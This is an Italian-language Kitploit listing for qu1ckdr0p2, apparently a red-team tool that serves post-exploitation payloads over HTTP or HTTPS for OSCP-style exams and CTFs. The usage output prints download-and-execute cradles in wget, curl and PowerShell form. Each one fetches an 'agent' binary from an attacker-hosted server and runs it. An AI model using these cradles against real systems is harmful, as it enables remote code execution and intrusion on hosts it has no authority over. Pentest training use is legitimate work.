Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
qu1ckdr0p2 — Quicky serve file su http o https usando Flask. | Kitploit
Strumenti/GitHubGitHub/byinarie/qu1ckdr0p2
Generazione di PayloadPost-ExploitSicurezza WebPenetration TestingRed TeamingSviluppo Payload
GitHubbyinarie/qu1ckdr0p2

qu1ckdr0p2

Quicky serve file su http o https usando Flask.

Vedi Repository
3552 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Python Flask Visual Studio Code Prettier License: MIT

Informazioni

Ospita rapidamente payload e binari post-exploitation tramite HTTP o HTTPS.

Progettato per essere utilizzato in esami come OSCP / PNPT o CTF HTB / ecc.

Pull request e issue sono benvenuti. Così come qualsiasi contributo.

Qu1ckdr0p2 include una funzione di alias e ricerca. Gli strumenti si trovano nel repository qu1ckdr0p2-tools. Per impostazione predefinita genererà un certificato autofirmato da utilizzare con l'opzione --https, viene data priorità anche all'interfaccia tun0 quando il server web è in esecuzione, altrimenti utilizzerà eth0.

Il file common.ini definisce gli alias mappati utilizzati nelle opzioni --search e -u.

Quando il server web è in esecuzione, vengono stampati a schermo diversi download cradle da copiare e incollare.

NOTA

Quando copi e incolli un download cradle, a seconda del tuo emulatore di terminale, potrebbe essere necessario fare un rapido doppio o triplo clic per evidenziarlo e copiarlo. Questo verrà risolto in una versione successiva.

Installazione

Usare pip è l'unico metodo supportato per l'installazione

Clonare questo repository per installare probabilmente romperà qualcosa

root@kitploit:~
pip3 install qu1ckdr0p2

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc

or

echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc

serv init --update

Utilizzo

Servi un singolo file nella directory di lavoro corrente

root@kitploit:~
$ serv serve -f implant.bin --https 443
root@kitploit:~
$ serv serve -f file.example --http 8080

Aggiornamento e aiuto

root@kitploit:~
$ serv --help            
Usage: serv [OPTIONS] COMMAND [ARGS]...

  Welcome to qu1ckdr0p2 entry point.

Options:
  --debug  Enable debug mode.
  --help   Show this message and exit.

Commands:
  init   Perform updates.
  serve  Serve files.
root@kitploit:~
$ serv serve --help
Usage: serv serve [OPTIONS]

  Serve files.

Options:
  -l, --list         List aliases
  -s, --search TEXT  Search query for aliases
  -u, --use INTEGER  Use an alias by a dynamic number
  -f, --file FILE    Serve a file
  --http INTEGER     Use HTTP with a custom port
  --https INTEGER    Use HTTPS with a custom port
  -h, --help         Show this message and exit.
root@kitploit:~
$ serv init --help       
Usage: serv init [OPTIONS]

  Perform updates.

Options:
  --update            Check and download missing tools.
  --update-self       Update the tool using pip.
  --update-self-test  Used for dev testing, installs unstable build.
  --help              Show this message and exit.
root@kitploit:~
$ serv init --update
root@kitploit:~
$ serv init --update-self

Servi un file da un alias mappato

I numeri degli alias mappati per l'opzione -u sono dinamici, quindi non devi ricordare numeri specifici o digitare mai un nome di strumento.

root@kitploit:~
$ serv serve --search ligolo               

[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1

[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2

[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3

[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)
root@kitploit:~
$ serv serve --search ligolo -u 3 --http 80

[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit

[→] URL: http://192.168.1.5:80/agent

[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

⠧ Web server running

Licenza

MIT


Scarica lo strumento